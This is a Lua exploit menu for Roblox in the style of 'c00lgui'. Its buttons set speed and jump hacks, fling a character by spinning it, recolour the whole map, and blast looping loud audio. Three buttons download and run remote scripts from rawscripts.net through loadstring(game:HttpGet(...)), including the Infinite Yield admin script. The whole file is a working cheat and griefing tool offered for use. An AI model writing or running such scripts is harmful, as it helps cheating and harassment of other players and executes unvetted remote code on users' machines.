-- c00ntemplanie oficial - c00lgui style local player = game.Players.LocalPlayer local UIS = game:GetService("UserInputService") local RunService = game:GetService("RunService") local Lighting = game:GetService("Lighting") local SoundService = game:GetService("SoundService") ------------------------------------------------ -- GUI ------------------------------------------------ local gui = Instance.new("ScreenGui", player.PlayerGui) gui.Name = "c00ntemplanie_oficial" gui.ResetOnSpawn = false local main = Instance.new("Frame", gui) main.Size = UDim2.new(0, 280, 0, 440) main.Position = UDim2.new(0, 20, 0.5, -220) main.BackgroundColor3 = Color3.fromRGB(70,70,70) -- c00lgui gray main.BorderSizePixel = 3 main.BorderColor3 = Color3.new(0,0,0) main.Active = true main.Draggable = true -- borde negro ↔ blanco task.spawn(function() while true do main.BorderColor3 = Color3.new(1,1,1) task.wait(0.6) main.BorderColor3 = Color3.new(0,0,0) task.wait(0.6) end end) local title = Instance.new("TextLabel", main) title.Size = UDim2.new(1,0,0,30) title.BackgroundColor3 = Color3.fromRGB(90,90,90) title.Text = "c00ntemplanie oficial" title.TextColor3 = Color3.new(1,1,1) title.Font = Enum.Font.ArialBold title.TextSize = 16 title.BorderSizePixel = 2 title.BorderColor3 = Color3.new(0,0,0) local list = Instance.new("Frame", main) list.Position = UDim2.new(0,0,0,32) list.Size = UDim2.new(1,0,1,-32) list.BackgroundTransparency = 1 local layout = Instance.new("UIListLayout", list) layout.Padding = UDim.new(0,6) ------------------------------------------------ -- c00lgui button helper ------------------------------------------------ local function btn(text, callback) local b = Instance.new("TextButton") b.Size = UDim2.new(1,-14,0,30) b.Position = UDim2.new(0,7,0,0) b.Text = text b.Font = Enum.Font.Arial b.TextSize = 14 b.TextColor3 = Color3.new(1,1,1) b.BackgroundColor3 = Color3.fromRGB(100,100,100) b.BorderSizePixel = 2 b.BorderColor3 = Color3.new(0,0,0) b.Parent = list b.MouseEnter:Connect(function() b.BackgroundColor3 = Color3.fromRGB(120,120,120) end) b.MouseLeave:Connect(function() b.BackgroundColor3 = Color3.fromRGB(100,100,100) end) b.MouseButton1Click:Connect(callback) end ------------------------------------------------ -- PLAYER ------------------------------------------------ local char = player.Character or player.CharacterAdded:Wait() local hum = char:WaitForChild("Humanoid") btn("Speed 999", function() hum.WalkSpeed = 999 end) btn("Jump +25", function() hum.JumpPower += 25 end) ------------------------------------------------ -- SPIN SOLO ROTACIÓN (FLING) ------------------------------------------------ btn("SPIN 999%", function() local hrp = char:FindFirstChild("HumanoidRootPart") if not hrp then return end for _,v in pairs(hrp:GetChildren()) do if v.Name == "SpinOnly" then v:Destroy() end end local att = hrp:FindFirstChild("SpinAttachment") or Instance.new("Attachment", hrp) local av = Instance.new("AngularVelocity") av.Name = "SpinOnly" av.Attachment0 = att av.MaxTorque = math.huge av.AngularVelocity = Vector3.new(0,9999,0) av.RelativeTo = Enum.ActuatorRelativeTo.World av.Parent = hrp task.delay(3,function() if av then av:Destroy() end end) end) ------------------------------------------------ -- SPAM COLORS ------------------------------------------------ local spamOn = false local hue = 0 btn("SPAM", function() spamOn = true end) RunService.Heartbeat:Connect(function() if spamOn then hue = (hue + 0.02) % 1 local c = Color3.fromHSV(hue,1,1) Lighting.Ambient = c Lighting.OutdoorAmbient = c for _,v in pairs(workspace:GetDescendants()) do if v:IsA("BasePart") then v.Color = c end end end end) ------------------------------------------------ -- LOUD MUSIC ------------------------------------------------ local loudIds = { 1843529274, 142376088, 1837467336 } btn("LOUD MUSIC", function() if SoundService:FindFirstChild("c00lLoud") then SoundService.c00lLoud:Destroy() end local s = Instance.new("Sound", SoundService) s.Name = "c00lLoud" s.SoundId = "rbxassetid://" .. loudIds[math.random(#loudIds)] s.Volume = 6 s.Looped = true s:Play() end) btn("STOP MUSIC", function() if SoundService:FindFirstChild("c00lLoud") then SoundService.c00lLoud:Destroy() end end) ------------------------------------------------ -- EXTERNAL (EXPLOIT) ------------------------------------------------ btn("ALL IN FIRE v2", function() pcall(function() loadstring(game:HttpGet( "https://rawscripts.net/raw/Free-Admin-Mario-exe-script-that-only-works-in-1-game-49286" ))() end) end) btn("Infinite Yield", function() pcall(function() loadstring(game:HttpGet( "https://rawscripts.net/raw/Universal-Script-Infinite-Yield-43437" ))() end) end) btn("Mario.exe Skybox", function() pcall(function() loadstring(game:HttpGet( "https://rawscripts.net/raw/Universal-Script-Mario-exe-skybox-28298" ))() end) end) ------------------------------------------------ -- TOGGLE GUI ------------------------------------------------ UIS.InputBegan:Connect(function(i,gp) if not gp and i.KeyCode == Enum.KeyCode.RightShift then main.Visible = not main.Visible end end)